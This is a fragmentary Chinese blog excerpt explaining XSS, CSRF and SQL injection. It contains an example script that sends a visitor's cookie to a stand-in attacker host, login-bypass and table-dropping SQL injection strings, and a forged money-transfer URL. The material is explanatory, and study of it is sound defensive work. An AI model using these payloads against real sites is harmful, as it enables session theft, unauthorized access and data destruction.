标签:需要 请求 流量 md5 网站 发送 服务 用户操作 二次
- XSS(跨站脚本攻击)
- CSRF(跨站请求伪造)
- SQL注入
- 总结几种常见web攻击手段极其防御方式
<script>window.open(“www.gongji.com?param=”+document.cookie)</script>,如果我没有对他的内容进行处理,直接存储到数据库,那么下一次当其他用户访问他的这篇文章的时候,服务器从数据库读取后然后响应给客户端,浏览器执行了这段脚本,然后就把该用户的cookie发送到攻击者的服务器了。<script>,应该只是字符串却有了代码的作用。‘ or ‘1‘= ‘1。这是最常见的sql注入攻击,当我们输如用户名 jiajun ,然后密码输如‘or ‘1‘= ‘1的时候,我们在查询用户名和密码是否正确的时候,本来要执行的是select * from user where username=‘‘ and password=‘‘,经过参数拼接后,会执行sql语句 select * from user where username=‘jaijun‘ and password=‘ ‘ or ‘ 1‘=‘1 ‘,这个时候1=1是成立,自然就跳过验证了。‘;drop table user;--,那么sql命令为select * from user where username=‘jiajun‘ and password=‘‘;drop table user;--‘ 这个时候我们就直接把这个表给删除了www.A.com/transfer?account=666&money=10000,那么这个时候很可能我就向账号为666的人转了1w软妹币标签:需要 请求 流量 md5 网站 发送 服务 用户操作 二次
原文地址:http://www.cnblogs.com/whb11/p/7200897.html